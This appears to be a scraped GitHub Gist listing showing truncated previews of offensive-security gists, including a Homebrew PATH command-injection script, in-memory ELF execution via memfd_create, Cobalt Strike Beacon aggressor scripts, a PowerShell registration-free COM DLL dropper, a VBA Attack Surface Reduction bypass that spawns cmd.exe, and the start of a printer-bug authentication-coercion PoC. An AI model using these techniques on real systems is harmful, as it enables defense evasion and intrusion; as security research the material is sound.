| IDA Plugins | Preferred | Neutral | Unreviewed |
|---|
Noah thesubtlety
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| WARNING: | |
| the newest version of this rule is now hosted here: | |
| https://github.com/Neo23x0/god-mode-rules/blob/master/godmode.yar | |
| */ | |
| /* | |
| _____ __ __ ___ __ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Command Injection via Homebrew $PATH trickery | |
| # n0ncetonic | |
| # Blacksun Research Labs 2019 | |
| # https://github.com/n0ncetonic | |
| # https://github.com/BlacksunLabs | |
| banner=$(/bin/cat <<EOF | |
capnspacehook
/ invokeInMemLinux.go
Created
February 21, 2019 13:37
Executes a binary or file in memory on a Linux system. Uses the memfd_create(2) syscall. Credits and idea from: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "io/ioutil" | |
| "os" | |
| "os/exec" | |
| "strconv" | |
| "syscall" |
rsmudge
/ initial.cna
Created
February 20, 2019 20:33
How to automate Beacon to execute a sequence of tasks with each checkin...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Demonstrate how to queue tasks to execute with each checkin... | |
| # | |
| # | |
| # yield tells a function to pause and return a value. The next time the same instance of the | |
| # function is called, it will resume after where it last yielded. | |
| # | |
| sub stuffToDo { | |
| # Tasks for first checkin |
analyticsearch
/ DllLoadAnythingViaScript
Created
December 27, 2018 06:39
DynamicWrapperX - Dropper , Registration-Free Execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Doesn't Even Have to Be A Conformant COM DLL To trigger the load. | |
| # Sample DLL To inject here | |
| # https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179 | |
| $manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>'; | |
| $ax = new-object -Com "Microsoft.Windows.ActCtx" | |
| $ax.ManifestText = $manifest; | |
| $DWX = $ax.CreateObject("JustMakeSomethingUp"); |
infosecn1nja
/ ASR Rules Bypass.vba
Last active
April 27, 2025 22:13
ASR rules bypass creating child processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
| $sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
| $temppath = "/tmp/"; | |
| beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
| alias sharpgen{ | |
| $executionId = "sharpgen_" . int(rand() * 100000); | |
| $temporaryCsharp = $temppath . $executionId . ".cs"; | |
| $executableFilename = $temppath . $executionId . ".exe"; |
3xocyte
/ dementor.py
Last active
February 25, 2025 00:20
rough PoC to connect to spoolss to elicit machine account authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------------------------- | |
| <WinProcess "smss.exe" pid 520 at 0x5db0c50L> | |
| 64 | |
| [!!] Invalid rpcrt4 base: 0x0 vs 0x7ff868230000 | |
| -------------------------------------------------------------------------------- | |
| <WinProcess "csrss.exe" pid 776 at 0x5db0908L> | |
| 64 | |
| Interfaces : | |
| Endpoints : |